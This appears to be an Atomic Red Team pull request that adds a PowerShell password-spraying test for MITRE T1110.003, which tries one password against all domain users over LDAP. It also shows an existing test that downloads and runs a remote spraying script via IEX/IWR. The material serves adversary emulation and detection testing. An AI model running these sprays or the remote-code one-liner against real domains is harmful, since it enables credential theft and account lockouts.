### PR TITLE
T1110.003: add test "Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)"

### DIFF
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -3,10 +3,10 @@ display_name: 'Brute Force: Password Spraying'
 atomic_tests:
 - name: Password Spray all Domain Users
   auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175
-  description: 
+  description:
     CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
 
-    This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. 
+    This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list.
     Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period.
     Use the input arguments to specify your own password to use for the password spray.
 
@@ -37,7 +37,7 @@ atomic_tests:
   auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
   description: |
     Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
-    
+
     https://github.com/dafthack/DomainPasswordSpray
 
   supported_platforms:
@@ -48,9 +48,60 @@ atomic_tests:
       description: Domain to brute force against
       type: String
       default: (Get-ADDomain | Select-Object -ExpandProperty Name)
-    
+
   executor:
     name: powershell
     elevation_required: false
     command: |
       IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
+- name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
+  auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
+  description: |
+    Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
+
+    Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
+  supported_platforms:
+  - windows
+  input_arguments:
+    password:
+      description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
+      type: String
+      default: P@ssw0rd!
+    domain:
+      description: Domain FQDN
+      type: String
+      default: contoso.com
+    auth:
+      description: authentication method to choose between "NTLM" and "Kerberos"
+      type: string
+      default: NTLM
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) {
+        Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
+        exit 1
+      }
+
+      $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName
+
+      [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
+      $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)
+
+      $DomainUsers | Foreach-Object {
+        $user = $_
+        $password = "#{password}"
+
+        $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}")
+        $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
+        try {
+          Write-Host " [-] Attempting ${password} on account ${user}."
+          $conn.bind()
+          # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+          Write-Host " [!] ${user}:${password} are valid credentials!"
+        } catch {
+          Write-Host $_.Exception.Message
+        }
+      }
+      Write-Host "End of password spraying"


### PR DESCRIPTION
**Details:**
Add a new password spraying test. This variant uses builtin API against LDAP and allows to choose between NTLM and Kerberos
Similar to #1354

You'll notice that I already included a GUID because I needed to reference it elsewhere. It is randomly generated and not already used in the project. I hope you don't mind :)

You can find me on the ART Slack if you want to discuss this!

**Testing:**
Tested in an AD lab

**Associated Issues:**
None